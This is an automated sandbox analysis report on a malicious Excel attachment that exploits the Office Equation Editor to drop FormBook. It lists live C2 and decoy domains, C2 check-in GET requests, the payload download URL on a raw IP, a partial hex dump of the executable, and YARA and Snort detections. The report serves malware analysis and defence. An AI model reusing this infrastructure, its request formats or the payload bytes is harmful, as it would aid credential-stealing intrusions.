Windows Analysis Report (RFQ) No.109050.xlsx

AV Detection:

Found malware configuration

Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}

Multi AV Scanner detection for submitted file

Source: (RFQ) No.109050.xlsx

ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7	Avira URL Cloud: Label: malware
Source: www.afishin.com/r48a/	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.vbc.exe.400000.2.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.hansel-design.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi		7_2_00415679
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop edi		9_2_00095679

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.corpmat.com
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 144.217.61.66 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.boxtobookshelf.com
Source: C:\Windows\explorer.exe	Domain query: www.hansel-design.com
Source: C:\Windows\explorer.exe	Domain query: www.aubergetoitrouge.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.89.208 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.afishin.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.afishin.com/r48a/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.12.84.109 198.12.84.109

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:41:57 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22Last-Modified: Wed, 15 Sep 2021 04:42:06 GMTETag: "83800-5cc0151fdab7b"Accept-Ranges: bytesContent-Length: 538624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.84.109

Found strings which match to known social media urls

Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: 45F1FF87.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.hansel-design.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8

Screenshot OCR: Enable Editing from the 18 , yellow bar above 19 This document is 20 3 Once you have enabled ed

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

.NET source code contains very large strings

Source: vbc[1].exe.4.dr, Forms/mainForm.cs	Long String: Length: 38272
Source: vbc.exe.4.dr, Forms/mainForm.cs	Long String: Length: 38272
Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	Long String: Length: 38272

Yara signature match

Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
